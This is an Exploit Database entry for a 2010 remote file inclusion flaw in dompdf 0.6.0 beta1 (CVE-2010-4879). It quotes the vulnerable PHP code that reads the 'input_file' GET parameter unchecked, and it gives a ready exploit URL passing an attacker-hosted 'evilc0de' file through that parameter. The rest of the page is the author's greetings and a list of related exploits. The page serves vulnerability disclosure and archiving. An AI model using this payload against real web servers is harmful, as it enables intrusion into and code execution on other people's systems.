Exploit Database - Logo

dompdf 0.6.0 beta1 - Remote File Inclusion

EDB-ID: 14851 Author: Andre_Corleone Published: 2010-09-01
CVE: CVE-2010-4879 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Waiting verification Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
==================================
  apps dompdf RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : apps dompdf RFI Vulnerability
[x] DatE          : 01 September 2010
[x] AutH0r        : Andre_Corleone
[x] Software Link : www.digitaljunkies.ca/dompdf/
[x] h0mE          : http://tecon-crew.org
[x] TestEd 0n     : linux ubuntu 10.04
[x] d0rK          : :P
====================================================

==========================================================================================
[x]bug heRe:
if ( isset($_GET["input_file"]) )
$file = rawurldecode($_GET["input_file"]);
else
throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable).");
==========================================================================================

==================================================================
[x]expL0iT:
http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?]
==================================================================

============================================================================================
[x]th4nKs t0:
ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari
guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you
============================================================================================

=====================
[x]Jakarta,Indonesia
=====================

Related Exploits

Trying to match CVEs (1): CVE-2010-4879
Trying to match OSVDBs (1): 56579
Trying to match setup file: 4db19b2bf601ac5ff8c3ab49a67e46c8
Other Possible E-DB Search Terms: dompdf 0.6.0 beta1,  dompdf
Date D V Title Author
2014-04-24Download Exploit Code Verified dompdf 0.6.0 - 'dompdf.php' 'read' Parameter Arbitrary File ReadPortcullis
2014-12-02Download Exploit Code Waiting verification TYPO3 ke DomPDF Extension - Remote Code ExecutionRedTeam Pen...
Menu